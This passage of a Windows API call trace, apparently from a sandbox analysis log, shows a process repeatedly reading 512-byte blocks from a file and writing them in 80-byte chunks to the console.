[0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.124] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.124] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 
[0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.124] GetFileType (hFile=0x4c) returned 0x1 [0146.124] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0146.125] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.125] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] GetFileType (hFile=0x4c) returned 0x1 [0146.125] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.125] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.126] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.126] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType 
(hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] GetFileType (hFile=0x4c) returned 0x1 [0146.126] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.126] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.127] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.127] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, 
lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] GetFileType (hFile=0x4c) returned 0x1 [0146.127] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.127] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, 
lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.128] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.128] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] GetFileType (hFile=0x4c) returned 0x1 [0146.128] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.128] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.129] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.129] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0146.129] GetFileType (hFile=0x4c) returned 0x1 [0146.129] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.129] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] GetFileType (hFile=0x4c) returned 0x1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.130] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.130] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.130] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.130] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, 
lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] GetFileType (hFile=0x4c) returned 0x1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.131] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.131] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] GetFileType (hFile=0x4c) returned 0x1 [0146.132] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.132] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: 
